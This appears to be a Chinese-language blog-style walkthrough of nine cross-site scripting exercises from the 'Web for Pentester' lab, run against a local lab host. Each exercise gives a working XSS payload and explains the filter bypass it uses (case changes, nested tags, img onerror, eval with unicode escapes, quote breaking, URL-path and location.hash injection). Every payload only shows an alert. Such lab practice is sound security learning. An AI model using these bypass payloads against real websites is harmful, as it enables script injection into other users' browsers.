example 1
url上改成name=<script>alert(1)</script>即可
example 2
把script中随便哪个字母改成大写即可
example 3
http://192.168.1.102/xss/example3.php?name=<Sc<script>ript>alert(1)<%2fSc</script>ript>
他会把<script>和</script>过滤掉,所以从当中插入,另外"/"需要转成 %2f 编码一下
example 4
一开始看不出来,只要有script都报error,于是用了name=<img%20src="image.gif"%20οnerrοr="alert(1)"%20/>避开了script。。后来一看文档的答案,还真是这个思路。。
example 5
发现输入其他的好像没问题,但是出现alert(1)就报错了,记得有其他的弹窗类型,比如confirm,试了一下果然可以: name=<img%20src="asd"%20οnerrοr=confirm("1")%20/>
根据答案文档的说法,还可以用eval,试了下,先把alert转换到ASCII,即\u0061\u006c\u0065\u0072\u0074,所以答案是name=<script>eval(\u0061\u006c\u0065\u0072\u0074(1))</script>,不过String.fromCharCode()暂时没试出来。
example 6
随便输入一些字母,发现被放在了<script> var $a="输入的字母"; </script> 中间。这就很简单了,把两边的双引号结束掉当中再插个alert就可以了:
name=";alert(1);%20var%20$b="
example 7
就把上一题的双引号改成单引号就可以了。。
example 8
这题把注意力都放在输入框里了,但是发现不管输入什么都会被编码,试了很久这条路不通。
看了提示才发现其实入口不在输入框而在URL上:<form action="/xss/example8.php" method="POST">
所以改成 http://192.168.1.102/xss/example8.php/"><script>alert(1)</script><form%20action=" 就对了
example 9
这题做的时候有点混乱。。先贴答案,把URL改成http://192.168.1.102/xss/example9.php#<script>alert(1)</script>
首先看到代码里有<script> document.write(location.hash.substring(1)); </script>,所以显然入口在这里。
百度了一发,location.hash就是得到URL中”#“开始的字符串。substring(1)就得到了#后的字符串。
document.write()是把括号中的部分写到HTML文档的这段代码后(我大概这么理解了一下)
所以就在#后加入payload:#<script>alert(1)</script>
按F12看到HTML改成了:
PS:奇怪的是之前写简单的HTML,用chrome测试document.write()的时候,它会自动在文档中加入双引号,即使再用双引号注释掉也做不到弹窗。以后再试试看吧。
总体来说,web for pentester这9题算是很不错的XSS入门练习了,做完9题,会有一个简单直观的了解。